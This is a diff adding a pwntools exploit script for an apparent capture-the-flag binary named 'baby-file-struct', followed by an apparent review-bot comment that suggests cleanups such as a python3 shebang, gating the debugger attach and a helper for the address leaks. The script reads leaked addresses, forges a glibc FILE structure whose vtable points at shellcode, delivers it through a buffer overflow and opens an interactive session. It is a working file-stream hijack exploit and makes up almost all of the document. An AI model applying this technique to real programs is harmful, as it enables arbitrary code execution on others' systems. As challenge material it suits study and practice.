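--- /dev/null
+++ b/PATH_NOT_SHOWN
@@ -0,0 +1,43 @@
+#!/usr/bin/env python
+from pwn import *
+from pwnlib.filepointer import *
+
+elf = ELF('./baby-file-struct')
+libc_file = "../libc.so.6.md5.5898fac5d2680d0d8fefdadd632b7188"
+p = process("./baby-file-struct", env={'LD_PRELOAD': libc_file})
+
+context.log_level = 'debug'
+context.terminal = ['tmux', 'splitw', '-h']
+context.arch = 'amd64'
+gdb.attach(p, 'init-gef')
+
+p.recvuntil("shellcode: ")
+shellcode_addr = int(p.recvline().decode().strip(), 16)
+print(f"shellcode_addr: {hex(shellcode_addr)}")
+
+p.recvuntil("shellcode2: ")
+shellcode2_addr = int(p.recvline().decode().strip(), 16)
+print(f"shellcode2_addr: {hex(shellcode2_addr)}")
+
+p.recvuntil("challenge.buf: ")
+buf_addr = int(p.recvline().decode().strip(), 16)
+print(f"buf_addr: {hex(buf_addr)}")
+
+p.recvuntil("challenge.fp: ")
+fp_addr = int(p.recvline().decode().strip(), 16)
+print(f"fp_addr: {hex(fp_addr)}")
+
+lock_offset = 0x0
+file_struct_offset = 0x10
+vtable_offset = 0x110
+fake_file = FileStructure(null=0xdeadbeef)
+fake_file.vtable = buf_addr + vtable_offset
+fake_file._lock = buf_addr + lock_offset
+
+p.sendlineafter("bof: ", flat({
+ 0x0: b'A' * 0x10, # lock
+ 0x10: bytes(fake_file),
+ vtable_offset: p64(shellcode_addr),
+ 0x200: p64(buf_addr + file_struct_offset),
+ }))
+p.interactive()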
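Review bot: The shebang on line 1 is `#!/usr/bin/env python`, but the script uses f-strings on lines 16, 20, 24 and 28, so on a host where `python` still resolves to Python 2 it dies with a SyntaxError before the process is even started; `#!/usr/bin/env python3` matches the code that follows. The unconditional `gdb.attach(p, 'init-gef')` on line 12, together with `context.log_level = 'debug'` and the tmux terminal, means a plain run without a tmux session and a GEF init file fails or hangs at attach; gating it as `if args.GDB: gdb.attach(p, 'init-gef')` keeps the same debugging workflow while letting the script run cleanly otherwise. The `recvuntil`/`sendlineafter` markers are `str` literals, which pwntools on Python 3 accepts only with a text-is-not-bytes warning; `b"shellcode: "` and the like are the exact form. The four identical leak-parsing stanzas on lines 14–28 would read better as one helper that reads the label, parses the hex line and logs it, so a malformed line fails at a named step rather than with a bare ValueError from `int()`.
```python
# … unchanged: process setup and context …

def leak(label: bytes) -> int:
    """Read the hex address the target prints after *label* and log it."""
    p.recvuntil(label)
    value = int(p.recvline().decode().strip(), 16)
    log.info("%s%#x", label.decode(), value)
    return value

shellcode_addr = leak(b"shellcode: ")
shellcode2_addr = leak(b"shellcode2: ")
buf_addr = leak(b"challenge.buf: ")
fp_addr = leak(b"challenge.fp: ")
# … unchanged: fake FILE construction and send …
```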